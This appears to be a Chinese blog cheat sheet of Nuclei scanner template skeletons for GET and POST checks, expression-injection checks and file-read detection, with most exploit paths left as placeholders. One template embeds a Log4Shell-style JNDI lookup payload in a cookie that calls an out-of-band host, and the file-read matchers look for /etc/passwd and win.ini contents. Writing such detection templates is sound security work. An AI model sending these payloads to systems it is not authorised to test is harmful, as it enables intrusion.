nuclei常用templates模板

GET

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
id: base  
info:
  name: base 
  author: msk
  description: 描述漏洞基本情况
  severity: info 漏洞等级
  reference: https://www.exploit-db.com/ghdb/6814  漏洞来源
  tags: detect 标签
  metadata:
    veified: true
    fofa-query: fofa语法
    hunter-query: 鹰图语法

http:
  - raw:
      - |
        GET /xxxx/xxx HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Cookie: OFBiz.Visitor=${jndi:ldap://{{interactsh-url}}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Content-Type: application/json;charset=UTF-8
        user-client: 1

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"xxx1","xxx2")' # 匹配多个Responses中关键词
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
id: CVE-xxxx-xxxxx


info:
  name: naturehi
  author: naturehi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/(poc部分)"


    stop-at-first-match: true
    matchers-condition: and
    matchers:


      - type: regex
        regex:
          - "(你具体要在响应包所匹配的值)"


      - type: status
        status:
          - 200
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

id: CNVD-xxxx


info:
  name: naturehi
  author: naturehi

variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


http:
  - method: GET
    path:
      - "{{BaseURL}}/(poc){{num1}}*{{num2}}"
      - "{{BaseURL}}/(poc){{num1}}*{{num2}}"


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"


      - type: status
        status:
          - 200

POST请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

id: CNVD-xxx-xxxx


info:
  name: naturehi
  author: naturehi
  metadata:
    fofa-query: app="Landray OA system"


requests:
  - raw:
      - |
        POST /(poc路径) HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded


        var={"body":{"POST请求值"}}


    stop-at-first-match: true
    matchers-condition: and
    matchers:


      - type: regex
        regex:
          - "(需要匹配的特征值)"
        condition: or


      - type: status
        status:
          - 200
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
id: CNVD-xxx-xxx


info:
  name: naturehi
  author: naturehi

requests:
  - raw:
      - |
        POST /(poc)HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        (poc请求值)


    matchers:
      - type: regex
        regex:
          - "(需要匹配的值)"

文件读取

/etc/passwd

1
2
3
4
5
matchers:
- type: regex
     regex:
       - "root:.*:0:0:"
     part: body

C:/windows/win.ini

1
2
3
4
5
matchers:    
- type: regex
     regex:
       - "bit app support"
     part: body

匹配返回包中的值

__END__